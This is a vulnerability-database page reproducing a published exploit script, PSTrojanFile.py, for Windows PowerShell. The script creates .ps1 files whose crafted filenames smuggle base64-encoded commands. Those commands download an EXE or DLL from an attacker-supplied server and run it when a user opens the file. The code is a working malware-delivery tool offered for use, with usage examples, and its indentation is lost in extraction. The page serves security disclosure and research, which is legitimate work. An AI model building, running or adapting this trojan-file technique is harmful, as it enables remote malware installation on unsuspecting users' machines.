Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows PowerShell Remote Command Execution

🗓️ 08 Jun 2023 00:00:00Reported by hyp3rlinx, hyp3rlinx.altervista.orgType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 320 Views

Microsoft Windows PowerShell Remote Command Executio

Code
`from base64 import b64encode  
import argparse,sys,os  
#PSTrojanFile.py  
#By hyp3rlinx (c) 2023  
#ApparitionSec  
#hyp3rlinx.altervista.org  
#twitter.com/hyp3rlinx  
#twitter.com/malvuln  
#PoC Video: https://www.youtube.com/watch?v=-ZJnA70Cf4I  
#============================================================================================  
#Create vulnerable Windows .PS1 (PowerShell) files with specially crafted exploitable names.  
#Example:  
#Test;POweRsHeLL -e [BASE64 PAYLOAD];.ps1  
#Testing;saps (gc -)PoC;.ps1  
#  
#Updated for Python3 from my orginal 2019 script with added DLL support and fixes.  
#Creates malicious ".ps1" PowerShell files with embedded trojan filename commands.  
#Download, save and execute malware (EXE,DLL) all from within a PowerShell Filename.  
#Expects hostname/ip-address of web-server housing an executable.  
#  
#Vectors:  
#Double-click, drag and drop to a PowerShell shortcut, command line.  
#  
#Requirements:  
#=============  
#1) .PS1 files set to open and run with PowerShell as the default program   
#2) Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force  
#  
#By hyp3rlinx - apparitionSec  
#===========================================================================================  
BANNER="""  
_ \ ___| __ __| _) ____| _) |   
| | \___ \ | __| _ \ | _` | __ \ | | | _ \   
___/ | | | ( | | ( | | | __| | | __/   
_| _____/ _| _| \___/ | \__,_| _| _| _| _| _| \___|   
___/  
By hyp3rlinx  
(C) circa 2023  
"""  
  
#Console colors  
RED="\033[1;31;40m"  
GREY="\033[1;30;40m"  
CYAN="\033[1;36;40m"  
YELLOW="\033[1;33;40m"  
ENDC = '\033[m' #Default  
  
def parse_args():  
parser.add_argument("-i", "--ipaddress", help="Remote server hosting a Malware.")  
parser.add_argument("-m", "--local_malware_name", help="Name of the Malware on disk after download.")  
parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")  
parser.add_argument("-t", "--type", help="Executable type EXE or DLL (required)")  
parser.add_argument("-f", "--from_file", nargs="?", const="1", help="Execute commands from a local text-file named '-' (dash).")  
parser.add_argument("-u", "--usage", nargs="?", const="1", help="Usage examples.")  
return parser.parse_args()  
  
def show_usage():  
print(RED+BANNER+ENDC)  
print(CYAN+"[+] "+GREY+"PSTrojanFile.py -i 127.0.0.1 -m hate.exe -r 1.exe -t exe")  
print(CYAN+"[+] "+GREY+"PSTrojanFile.py -i x.x.x.x -m q.z -r s.dll -t dll"+ENDC)  
  
  
def main(args):  
PSEmbedFilenameMalwr=""  
if args.usage:  
show_usage()  
return  
if args.from_file: #Create PS1 file that executes code from a text-file using saps gc (get-content).  
if create_file("",1):  
success(1)  
if args.ipaddress:  
if not args.type:  
show_usage()  
print(YELLOW+"[!] "+GREY+"Provide the executable type DLL or EXE"+ENDC)  
exit(1)  
if args.type=="exe": #EXE saved to current dir where the vuln PS script is run.  
PSEmbedFilenameMalwr = "iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O "+args.local_malware_name+";sleep -s 2;start "+args.local_malware_name  
else: #DLL saved to users downloads directory.  
PSEmbedFilenameMalwr = "saps "+"http://"+args.ipaddress+"/"+args.remote_malware_name+";sleep -s2;rundll32 $HOME/Downloads/"+args.local_malware_name+", 0"  
return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')).decode()  
  
def success(obj):  
print(RED+BANNER+ENDC)  
print(GREY+"[+] PS1 Trojan File Created!")  
if obj==1:  
print(GREY+"[+] Added 'calc.exe' command to created file named '-' (dash)"+ENDC)  
  
def create_file(payload, local):  
if local==1:  
f=open("Testing;saps (gc -)PoC;.ps1", "w")  
f2=open("-", "w")  
f2.write("calc.exe")  
f2.close()  
else:  
f=open("Test;PoWeRShell -e "+payload+";2.ps1", "w")  
f.write("Write-Output 'Have a nice day GG!'")  
f.close()  
return True  
  
if __name__=="__main__":  
os.system("color")  
parser = argparse.ArgumentParser()  
PSCmds = main(parse_args())  
  
if len(sys.argv)==1:  
print(RED+BANNER+GREY)  
parser.print_help(sys.stderr)  
print(ENDC)  
sys.exit(1)  
if PSCmds:  
if create_file(PSCmds,0):  
success(0)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Jun 2023 00:00Current
7.1High risk
Vulners AI Score7.1
python3power-shellremote-command-executionvulnerabilitymalwaredouble-clickpowershell-shortcutcommand-linebase64executabledll-supportapparitionsechyp3rlinx
320